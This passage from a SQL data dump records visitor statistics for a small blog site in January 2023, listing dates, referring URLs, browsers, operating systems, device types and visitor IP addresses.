(27646,'2023-01-11','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.184.177.10','000',0,2,0),
(27647,'2023-01-11','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(27648,'2023-01-11','http://design-arena.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.66','000',0,1,0),
(27649,'2023-01-11','http://design-arena.ir/blog/','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.71','000',0,1,0),
(27650,'2023-01-11','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.26','000',0,3,0),
(27651,'2023-01-11','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.214.104.42','000',0,1,0),
(27652,'2023-01-11','http://ictbank.ir/blog','Chrome','Linux','108.0.0.0','desktop','Unknown','','44.236.207.248','000',0,2,0),
(27653,'2023-01-11','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.88','000',0,1,0),
(27654,'2023-01-11','https://www.google.com/','Firefox','Ubuntu','108.0','desktop','Unknown','','176.116.138.6','000',0,1,0),
(27655,'2023-01-11','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','103.152.40.204','000',0,1,0),
(27656,'2023-01-11','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.234','000',0,2,0),
(27657,'2023-01-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(27658,'2023-01-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.228','000',0,1,0),
(27659,'2023-01-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27660,'2023-01-11','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(27661,'2023-01-11','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27662,'2023-01-11','http://ictbank.ir/blog','Firefox','Windows','58.0.0','desktop','Unknown','','181.214.218.69','000',0,2,0),
(27663,'2023-01-11','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,2,0),
(27664,'2023-01-11','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(27665,'2023-01-11','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,4,0),
(27666,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','171.37.175.22','000',0,1,0),
(27667,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','124.235.138.105','000',0,1,0),
(27668,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','221.11.60.150','000',0,1,0),
(27669,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','111.85.200.196','000',0,1,0),
(27670,'2023-01-11','http://ictbank.ir/blog','Safari','iOS','13.0','mobile:smart','iPhone','','113.201.148.249','000',0,2,0),
(27671,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','124.133.208.76','000',0,1,0),
(27672,'2023-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','59.173.180.255','000',0,1,0),
(27673,'2023-01-11','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','121.56.26.173','000',0,1,0),
(27674,'2023-01-11','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','144.255.17.243','000',0,1,0),
(27675,'2023-01-12','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','149.90.193.30','000',0,1,0),
(27676,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','159.203.59.0','000',0,2,0),
(27677,'2023-01-12','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.234','000',0,2,0),
(27678,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','159.89.169.44','000',0,2,0),
(27679,'2023-01-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(27680,'2023-01-12','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27681,'2023-01-12','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.70','000',0,2,0),
(27682,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.213.183.159','000',0,2,0),
(27683,'2023-01-12','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(27684,'2023-01-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.103','000',0,2,0),
(27685,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','23.229.104.2','000',0,2,0),
(27686,'2023-01-12','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27687,'2023-01-12','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.67.187','000',0,1,0),
(27688,'2023-01-12','http://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','116.203.212.249','000',0,1,0),
(27689,'2023-01-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(27690,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.211.86','000',0,1,0),
(27691,'2023-01-12','http://wikisonnati.com/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.72','000',0,2,0),
(27692,'2023-01-12','http://ictbank.ir/blog/index.php/2021/02/06/hosting-a-podcast/','Edge','Windows','90.0.0.0','desktop','Unknown','','37.139.53.40','000',0,8,0),
(27693,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(27694,'2023-01-12','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(27695,'2023-01-12','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.152.83.207','000',0,2,0),
(27696,'2023-01-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','107.191.63.227','000',0,1,0),
(27697,'2023-01-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(27698,'2023-01-12','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,2,0),
(27699,'2023-01-12','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(27700,'2023-01-12','http://ictbank.ir/blog','Firefox','Windows','107.0','desktop','Unknown','','46.3.136.83','000',0,1,0),
(27701,'2023-01-12','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.106','000',0,1,0),
(27702,'2023-01-12','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.84','000',0,1,0),
(27703,'2023-01-12','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','180.163.220.114','000',0,1,0),
(27704,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','171.34.178.115','000',0,1,0),
(27705,'2023-01-12','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','180.163.220.68','000',0,1,0),
(27706,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','124.235.138.17','000',0,1,0),
(27707,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','119.164.108.237','000',0,1,0),
(27708,'2023-01-12','http://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','222.94.163.230','000',0,1,0),
(27709,'2023-01-12','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','58.211.23.183','000',0,2,0),
(27710,'2023-01-12','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.67','000',0,2,0),
(27711,'2023-01-13','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.171.221','000',0,2,0),
(27712,'2023-01-13','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,4,0),
(27713,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,5,0),
(27714,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(27715,'2023-01-13','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,2,0),
(27716,'2023-01-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(27717,'2023-01-13','http://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.154','000',0,2,0),
(27718,'2023-01-13','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','172.93.179.12','000',0,1,0),
(27719,'2023-01-13','http://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.16','000',0,2,0),
(27720,'2023-01-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(27721,'2023-01-13','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27722,'2023-01-13','https://www.google.com/','Firefox','Windows','108.0','desktop','Unknown','','5.175.39.254','000',0,1,0),
(27723,'2023-01-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','172.104.193.53','000',0,2,0),
(27724,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.156.172','000',0,2,0),
(27725,'2023-01-13','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','112.193.171.159','000',0,1,0),
(27726,'2023-01-13','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','36.32.2.222','000',0,1,0),
(27727,'2023-01-13','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','175.17.178.73','000',0,1,0),
(27728,'2023-01-13','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','123.145.10.246','000',0,1,0),
(27729,'2023-01-13','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.67','000',0,4,0),
(27730,'2023-01-13','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','58.211.23.183','000',0,4,0),
(27731,'2023-01-13','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.192.83','000',0,2,0),
(27732,'2023-01-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(27733,'2023-01-13','http://ictbank.ir/blog','Firefox','Unknown','26.0','desktop','Unknown','','80.120.129.210','000',0,2,0),
(27734,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','54.217.178.104','000',0,1,0),
(27735,'2023-01-13','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,8,0),
(27736,'2023-01-13','http://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Unknown','','82.157.34.137','000',0,2,0),
(27737,'2023-01-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','222.218.102.173','000',0,1,0),
(27738,'2023-01-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','14.204.44.155','000',0,1,0),
(27739,'2023-01-13','http://ictbank.ir/blog','QQ Browser','Windows','6.0','desktop','Unknown','','111.224.249.152','000',0,1,0),
(27740,'2023-01-13','http://ictbank.ir/blog','QQ Browser','Windows','6.0','desktop','Unknown','','111.175.7.32','000',0,1,0),
(27741,'2023-01-13','https://www.google.com/','Firefox','Windows','108.0','desktop','Unknown','','82.127.38.164','000',0,1,0),
(27742,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','34.0.0.0','desktop','Unknown','','178.62.74.6','000',0,7,0),
(27743,'2023-01-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27744,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','187.69.79.116','000',0,1,0),
(27745,'2023-01-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(27746,'2023-01-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27747,'2023-01-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.32.144.195','000',0,1,0),
(27748,'2023-01-13','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,2,0),
(27749,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','170.64.149.235','000',0,2,0),
(27750,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.87','000',0,2,0),
(27751,'2023-01-13','http://wikisonnati.com','Yandex Browser','iOS','17.0.0.0.0','mobile:smart','iPhone','','192.42.116.215','000',0,2,0),
(27752,'2023-01-13','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.78.46.68','000',0,2,0),
(27753,'2023-01-13','http://ictbank.ir/blog','Chrome','Windows','81.0.0.0','desktop','Unknown','','47.92.232.28','000',0,1,0),
(27754,'2023-01-13','https://www.bing.com','Chrome','Windows','41.0.0.0','desktop','Unknown','','64.227.30.80','000',0,1,0),
(27755,'2023-01-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(27756,'2023-01-13','http://45.92.94.221/blog/sitemap.xml','Chrome','Linux','76.0.0','desktop','Unknown','','107.150.104.217','000',0,6,0),
(27757,'2023-01-13','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,2,0),
(27758,'2023-01-14','https://www.google.com/','Firefox','Windows','108.0','desktop','Unknown','','61.6.203.7','000',0,1,0),
(27760,'2023-01-14','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,14,0),
(27761,'2023-01-14','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(27762,'2023-01-14','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(27763,'2023-01-14','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,2,0),
(27764,'2023-01-14','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27765,'2023-01-14','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,1,0),
(27766,'2023-01-14','http://ictbank.ir/blog','Chrome','OS X','81.0.0.0','desktop','Macintosh','','45.81.34.194','000',0,2,0),
(27767,'2023-01-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(27768,'2023-01-14','http://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(27769,'2023-01-14','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.250.122','000',0,2,0),
(27770,'2023-01-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.60','000',0,2,0),
(27771,'2023-01-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27772,'2023-01-14','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.216.239.88','000',0,1,0),
(27773,'2023-01-14','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,2,0),
(27774,'2023-01-14','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27775,'2023-01-14','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','185.178.193.135','000',0,2,0),
(27776,'2023-01-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.123.152','000',0,1,0),
(27777,'2023-01-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.118','000',0,1,0),
(27778,'2023-01-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(27779,'2023-01-14','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27780,'2023-01-14','http://ictbank.ir/blog','Firefox','Windows','64.0','desktop','Unknown','','143.198.202.60','000',0,2,0),
(27781,'2023-01-14','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','54.245.24.16','000',0,2,0),
(27782,'2023-01-14','http://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','5.75.172.205','000',0,7,0),
(27783,'2023-01-15','http://wikisonnati.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','89.117.20.171','000',0,2,0),
(27784,'2023-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(27785,'2023-01-15','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(27786,'2023-01-15','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.62','000',0,1,0),
(27787,'2023-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(27788,'2023-01-15','http://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(27789,'2023-01-15','http://ictbank.ir/blog','Firefox','Windows','36.0','desktop','Unknown','','99.81.172.94','000',0,1,0),
(27790,'2023-01-15','http://ictbank.ir/blog','Chrome','Windows','79.0.0','desktop','Unknown','','5.188.86.227','000',0,2,0),
(27791,'2023-01-15','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.150.68','000',0,1,0),
(27792,'2023-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,4,0),
(27793,'2023-01-15','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.78.46.68','000',0,2,0),
(27794,'2023-01-15','http://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','130.255.166.90','000',0,1,0),
(27795,'2023-01-15','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.220.142.70','000',0,2,0),
(27796,'2023-01-15','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','139.162.238.243','000',0,2,0),
(27797,'2023-01-15','http://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(27798,'2023-01-15','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(27799,'2023-01-15','http://ictbank.ir/blog','Chrome','Windows','68.0.0.0','desktop','Unknown','','185.119.81.97','000',0,4,0),
(27800,'2023-01-15','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.209.40.175','000',0,1,0),
(27801,'2023-01-15','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27802,'2023-01-15','http://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','5.238.215.177','000',0,4,0),
(27803,'2023-01-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27804,'2023-01-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.118','000',0,1,0),
(27805,'2023-01-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27806,'2023-01-15','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(27807,'2023-01-15','http://ictbank.ir/blog','Chrome','Windows','56.0.0.0','desktop','Unknown','','54.89.187.47','000',0,2,0),
(27808,'2023-01-15','http://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27809,'2023-01-16','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.83','000',0,1,0),
(27810,'2023-01-16','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.234','000',0,1,0),
(27811,'2023-01-16','http://ictbank.ir/blog','Chrome','Windows','48.0.0.0','desktop','Unknown','','185.119.81.97','000',0,6,0),
(27812,'2023-01-16','http://ictbank.ir/blog','Chrome','Linux','109.0.0.0','desktop','Unknown','','13.228.59.64','000',0,4,0),
(27813,'2023-01-16','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,8,0),
(27814,'2023-01-16','http://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(27815,'2023-01-16','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','23.248.175.240','000',0,3,0),
(27816,'2023-01-16','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.108.9.38','000',0,1,0),
(27817,'2023-01-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(27818,'2023-01-16','http://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(27819,'2023-01-16','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','37.201.231.57','000',0,4,0),
(27820,'2023-01-16','http://wikisonnati.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','143.198.82.50','000',0,2,0),
(27821,'2023-01-16','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.149.38.27','000',0,2,0),
(27822,'2023-01-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.36','000',0,1,0),
(27823,'2023-01-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(27824,'2023-01-16','http://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.50.70','000',0,1,0),
(27825,'2023-01-16','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','192.42.116.196','000',0,1,0),
(27826,'2023-01-16','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.146.232.168','000',0,1,0),
(27827,'2023-01-16','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.218.223.33','000',0,1,0),
(27828,'2023-01-16','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,4,0),
(27829,'2023-01-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(27830,'2023-01-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27831,'2023-01-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27832,'2023-01-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(27833,'2023-01-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27834,'2023-01-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(27835,'2023-01-17','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','197.83.236.73','000',0,1,0),
(27836,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','173.252.95.15','000',0,1,0),
(27837,'2023-01-17','http://ictbank.ir/blog','Edge','Windows','100.0.0.0','desktop','Unknown','','66.220.149.22','000',0,1,0),
(27838,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','173.252.95.18','000',0,1,0),
(27839,'2023-01-17','http://ictbank.ir/blog','Edge','Windows','100.0.0.0','desktop','Unknown','','66.220.149.117','000',0,1,0),
(27840,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','72.0.0.0','desktop','Unknown','','37.220.86.38','000',0,2,0),
(27841,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','22.0.0.0','desktop','Unknown','','45.143.201.87','000',0,2,0),
(27842,'2023-01-17','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(27843,'2023-01-17','https://www.google.com/','Chrome','Linux','105.0.0.0','desktop','Unknown','','101.53.242.149','000',0,1,0),
(27844,'2023-01-17','http://ictbank.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','51.89.201.226','000',0,9,0),
(27845,'2023-01-17','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.72.66','000',0,1,0),
(27846,'2023-01-17','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','80.250.168.252','000',0,1,0),
(27847,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.212.204.247','000',0,2,0),
(27848,'2023-01-17','http://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','128.14.188.209','000',0,1,0),
(27849,'2023-01-17','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(27850,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','185.119.81.97','000',0,2,0),
(27851,'2023-01-17','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,6,0),
(27852,'2023-01-17','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27853,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.162.254.217','000',0,1,0),
(27854,'2023-01-17','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','188.213.34.12','000',0,2,0),
(27855,'2023-01-17','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(27856,'2023-01-17','https://www.google.com/','Opera','OS X','94.0.0.0','desktop','Macintosh','','201.234.227.246','000',0,1,0),
(27857,'2023-01-17','http://ictbank.ir/blog/','Chrome','Windows','108.0.0.0','desktop','Unknown','','5.238.215.177','000',0,3,0),
(27858,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','54.224.23.61','000',0,1,0),
(27859,'2023-01-17','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','146.190.169.85','000',0,2,0),
(27860,'2023-01-17','http://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','5.9.90.66','000',0,9,0),
(27861,'2023-01-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.228','000',0,1,0),
(27862,'2023-01-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(27863,'2023-01-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27864,'2023-01-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27865,'2023-01-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
